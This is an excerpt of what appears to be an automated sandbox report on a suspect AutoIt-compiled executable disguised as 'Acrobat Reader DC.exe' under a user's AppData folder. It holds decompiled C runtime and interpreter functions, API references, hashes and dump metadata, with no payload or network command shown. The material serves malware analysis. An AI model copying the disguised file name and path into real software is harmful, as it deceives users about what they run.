                                  0x0042953d
                                  0x0042953e
                                  0x00429543
                                  0x00000000
                                  0x00429543
                                  0x00429507
                                  0x00429514
                                  0x00429517
                                  0x00429521
                                  0x00429526
                                  0x00429529
                                  0x00000000
                                  0x00429529
                                  0x004294cc
                                  0x004294cf
                                  0x004294d9
                                  0x004294de
                                  0x004294e0
                                  0x004294e3
                                  0x004294f0
                                  0x004294f8
                                  0x00000000
                                  0x004294f8
                                  0x00429486
                                  0x00429489
                                  0x0042948c
                                  0x00429492
                                  0x00429495
                                  0x00429498
                                  0x00000000
                                  0x00429498
                                  0x0042945a
                                  0x00429460
                                  0x00429469
                                  0x0042946c
                                  0x0042946e
                                  0x00429471
                                  0x00000000
                                  0x00429471
                                  0x00429434
                                  0x0042943f
                                  0x00429442
                                  0x00429445
                                  0x00429560
                                  0x00429566
                                  0x0042956b
                                  0x0042956b
                                  0x00429574
                                  0x00429578
                                  0x00429581
                                  0x00429589
                                  0x0042958a
                                  0x0042958d
                                  0x00429590
                                  0x00429593
                                  0x00429593
                                  0x00000000
                                  0x00429407
                                  0x00429353
                                  0x00429358
                                  0x00429364
                                  0x00000000
                                  0x0042936c
                                  0x0040f58c
                                  0x0040f592
                                  0x00000000
                                  0x00000000
                                  0x0040f5a9
                                  0x00000000

                                  APIs
                                  • _free.LIBCMT ref: 004295A0
                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                                  • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 2744521063-368524663
                                  • Opcode ID: 880aae0f25a8000fe6588a260fc2cee1b6e9e9d2e5696b5ac2ca62059b09666c
                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                  • Opcode Fuzzy Hash: 880aae0f25a8000fe6588a260fc2cee1b6e9e9d2e5696b5ac2ca62059b09666c
                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00401B10(void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t14;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr* _t20;
				void* _t34;
				intOrPtr* _t35;
				signed int _t41;

				_t35 = __esi;
				_t34 = __edi;
				_t14 = E004111C1(__edi);
				 *((intOrPtr*)(__esi + 4)) = _t14;
				_t15 = _t14 + 1;
				 *((intOrPtr*)(__esi + 8)) = _t15;
				if(_t15 == 0) {
					_t16 = 8;
				} else {
					_t16 = (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3);
					_t41 = _t16;
				}
				 *(_t35 + 8) = _t16;
				_push( ~(0 | _t41 > 0x00000000) | _t16 * 0x00000002); // executed
				_t18 = E004115D7(_t34, _t35, _t41); // executed
				 *_t35 = _t18;
				E00410E60(_t18, _t34,  *((intOrPtr*)(_t35 + 4)) +  *((intOrPtr*)(_t35 + 4)) + 2);
				_push(4); // executed
				_t20 = E004115D7(_t34, _t35, _t41); // executed
				if(_t20 == 0) {
					_t20 = 0;
				} else {
					 *_t20 = 1;
				}
				 *((intOrPtr*)(_t35 + 0xc)) = _t20;
				return _t35;
			}











                                  0x00401b10
                                  0x00401b10
                                  0x00401b11
                                  0x00401b19
                                  0x00401b1c
                                  0x00401b1d
                                  0x00401b20
                                  0x00426521
                                  0x00401b26
                                  0x00401b30
                                  0x00401b30
                                  0x00401b30
                                  0x00401b34
                                  0x00401b45
                                  0x00401b46
                                  0x00401b55
                                  0x00401b57
                                  0x00401b5c
                                  0x00401b5e
                                  0x00401b68
                                  0x0042652b
                                  0x00401b6e
                                  0x00401b6e
                                  0x00401b6e
                                  0x00401b74
                                  0x00401b79

                                  APIs
                                  • _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00401B57
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                  • String ID: @EXITCODE
                                  • API String ID: 2734553683-3436989551
                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00410100(void* __eax, void* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				char _v24;
				void* __edi;
				void* _t9;
				void* _t11;

				_t9 = E0040F760(__ecx,  &_v24, __eflags, __eax); // executed
				if(_t9 == 0) {
					_t11 = E004528BD(__eflags,  &_v24, L">>>AUTOIT NO CMDEXECUTE<<<",  &_v8,  &_v12); // executed
					__eflags = _t11;
					if(_t11 == 0) {
						E00413748(_v8);
						E00431E58( &_v24);
						return 1;
					} else {
						E00431E58( &_v24); // executed
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}









                                  0x0041010b
                                  0x00410112
                                  0x00428058
                                  0x0042805d
                                  0x0042805f
                                  0x00428073
                                  0x0042807f
                                  0x0042808a
                                  0x00428061
                                  0x00428065
                                  0x00000000
                                  0x00428065
                                  0x00410118
                                  0x00410118
                                  0x0041011e
                                  0x0041011e

                                  Strings
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00410107
                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 0-1618683850
                                  • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                  • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043213D(void* __edx, void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t11;
				void* _t13;
				intOrPtr _t14;
				intOrPtr _t15;

				_t12 = __edx;
				_t15 = _a4;
				_t5 = E004135BB(__edx, _t13, _t15, 0x20000); // executed
				_t14 = _t5;
				 *((intOrPtr*)(_t15 + 0x438)) = _t14;
				_t6 = E004135BB(__edx, _t14, _t15, 0x10000); // executed
				_t11 = _t6;
				 *((intOrPtr*)(_t15 + 0x45c)) = _t11;
				_t7 = E004135BB(_t12, _t14, _t15, 0x10000); // executed
				 *((intOrPtr*)(_t15 + 0x458)) = _t7;
				if(_t14 == 0 || _t11 == 0 || _t7 == 0) {
					E004320F8(_t15);
					return 5;
				} else {
					return 0;
				}
			}












                                  0x0043213d
                                  0x00432142
                                  0x0043214b
                                  0x00432150
                                  0x00432157
                                  0x0043215d
                                  0x00432162
                                  0x00432169
                                  0x0043216f
                                  0x00432177
                                  0x0043217f
                                  0x00432193
                                  0x004321a1
                                  0x0043218b
                                  0x0043218f
                                  0x0043218f

                                  APIs
                                  • _malloc.LIBCMT ref: 0043214B
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _malloc.LIBCMT ref: 0043215D
                                  • _malloc.LIBCMT ref: 0043216F
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc$AllocateHeap
                                  • String ID:
                                  • API String ID: 680241177-0
                                  • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                  • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D6B0(void* __fp0, char _a4, short* _a12) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				intOrPtr _v28;
				char _v36;
				int _v40;
				char _v48;
				struct HINSTANCE__* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t24;
				intOrPtr _t27;
				struct HINSTANCE__* _t32;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t63;

				_t63 = __fp0;
				_t21 =  *0x4a9604; // 0xa52e98
				if( *((intOrPtr*)(_t21 + 0x1d)) == 0) {
					_t22 = 1;
				} else {
					_t41 = _a4;
					 *0x497520 = _a4;
					 *0x4974f4 = 0;
					 *0x4974f0 = 0;
					_v36 = 0;
					_v28 = 1;
					_v24 = 0;
					_v20 = 0;
					_v12 = 1;
					_v8 = 0;
					E00408F40(1,  &_v36);
					_t43 =  &_v20;
					_v28 = 6;
					_v36 =  &_v20;
					_v48 = 0;
					_v40 = 0;
					 *0x49751c = 0;
					_t24 = E0040EBB0( &_v48);
					_t61 = _t24;
					if(_t24 != 0) {
						 *0x49751c =  *((intOrPtr*)(E0040EC00( &_v48, _t61)))();
					}
					E00411951(0, _t43, 1, 0x4370c3);
					E004119B0(1);
					_t27 =  *0x4a9608; // 0xa52f00
					E0040F4E0(_t41, _t27);
					E0040D590(_a12, _t41, _t61, _t63);
					_t42 =  *0x4a9608; // 0xa52f00
					SystemParametersInfoW(0x2001, 0,  *(_t42 + 4), 2);
					_t32 = _v52;
					_t48 =  *0x4974f4;
					if(_t32 != 0) {
						FreeLibrary(_t32);
					}
					E00408F40(_t48,  &_v20);
					E00408F40(_t48,  &_v36);
					_t22 = _t48;
				}
				return _t22;
			}























                                  0x0040d6b0
                                  0x0040d6b6
                                  0x0040d6c6
                                  0x0042e2f3
                                  0x0040d6cc
                                  0x0040d6cc
                                  0x0040d6d8
                                  0x0040d6de
                                  0x0040d6e4
                                  0x0040d6ea
                                  0x0040d6ee
                                  0x0040d6f2
                                  0x0040d6f6
                                  0x0040d6fa
                                  0x0040d6fe
                                  0x0040d702
                                  0x0040d707
                                  0x0040d70f
                                  0x0040d717
                                  0x0040d71b
                                  0x0040d71f
                                  0x0040d723
                                  0x0040d729
                                  0x0040d72e
                                  0x0040d730
                                  0x0040d739
                                  0x0040d739
                                  0x0040d743
                                  0x0040d74c
                                  0x0040d751
                                  0x0040d75a
                                  0x0040d762
                                  0x0040d767
                                  0x0040d779
                                  0x0040d77f
                                  0x0040d783
                                  0x0040d78b
                                  0x0040d78e
                                  0x0040d78e
                                  0x0040d798
                                  0x0040d7a1
                                  0x0040d7a6
                                  0x0040d7a6
                                  0x0040d7ae

                                  APIs
                                  • SystemParametersInfoW.USER32 ref: 0040D779
                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeInfoLibraryParametersSystem
                                  • String ID:
                                  • API String ID: 3403648963-0
                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414C76 Relevance: 3.0, APIs: 2, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00414C76(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;

				_push(0xc);
				_push(0x48d048);
				E00416C70(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E00415471( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E00414ABA( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E00414CFA();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00412F40( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
						}
						 *((intOrPtr*)(E00417F77(_t41))) = 0x16;
						E00417F25();
						goto L6;
					}
				}
				return E00416CB5(_t19);
			}






                                  0x00414c76
                                  0x00414c78
                                  0x00414c7d
                                  0x00414c84
                                  0x00414c8a
                                  0x00414cbb
                                  0x00414cbb
                                  0x00414c91
                                  0x00414c94
                                  0x00414cc6
                                  0x00414ccc
                                  0x00414cde
                                  0x00414ce6
                                  0x00414ce9
                                  0x00414cf0
                                  0x00414cf5
                                  0x00414c96
                                  0x00414c96
                                  0x00414c9a
                                  0x00414ca3
                                  0x00414ca8
                                  0x00414cb0
                                  0x00414cb6
                                  0x00000000
                                  0x00414cb6
                                  0x00414c94
                                  0x00414cc2

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_file_memset
                                  • String ID:
                                  • API String ID: 26237723-0
                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00414A46(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0x48d028);
				E00416C70(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E00415471(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E004149D9(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00414AB2(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00417F77(_t36))) = 0x16;
					_t22 = E00417F25() | 0xffffffff;
				}
				return E00416CB5(_t22);
			}








                                  0x00414a46
                                  0x00414a48
                                  0x00414a4d
                                  0x00414a52
                                  0x00414a58
                                  0x00414a5b
                                  0x00414a60
                                  0x00414a62
                                  0x00414a79
                                  0x00414a7d
                                  0x00414a8d
                                  0x00414a93
                                  0x00414a98
                                  0x00414a9e
                                  0x00414aa1
                                  0x00414aa8
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a7f
                                  0x00414a83
                                  0x00414a64
                                  0x00414a69
                                  0x00414a74
                                  0x00414a74
                                  0x00414a8b

                                  APIs
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  • __lock_file.LIBCMT ref: 00414A8D
                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00414FE2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed int _t17;
				void* _t27;
				intOrPtr _t29;

				_push(0xc);
				_push(0x48d068);
				E00416C70(__ebx, __edi, __esi);
				_t29 =  *((intOrPtr*)(_t27 + 8));
				_t30 = _t29 != 0;
				if(_t29 != 0) {
					E00415471( *((intOrPtr*)(_t27 + 8)));
					_t5 = _t27 - 4;
					 *_t5 =  *(_t27 - 4) & 0x00000000;
					__eflags =  *_t5;
					_t15 = E00414E4E(__edx,  *((intOrPtr*)(_t27 + 8))); // executed
					 *(_t27 - 0x1c) = _t15;
					 *(_t27 - 4) = 0xfffffffe;
					E0041503D();
					_t17 =  *(_t27 - 0x1c);
				} else {
					 *((intOrPtr*)(E00417F77(_t30))) = 0x16;
					_t17 = E00417F25() | 0xffffffff;
				}
				return E00416CB5(_t17);
			}







                                  0x00414fe2
                                  0x00414fe4
                                  0x00414fe9
                                  0x00414ff0
                                  0x00414ff6
                                  0x00414ff8
                                  0x00415012
                                  0x00415018
                                  0x00415018
                                  0x00415018
                                  0x0041501f
                                  0x00415025
                                  0x00415028
                                  0x0041502f
                                  0x00415034
                                  0x00414ffa
                                  0x00414fff
                                  0x0041500a
                                  0x0041500a
                                  0x0041503c

                                  APIs
                                  • __lock_file.LIBCMT ref: 00415012
                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
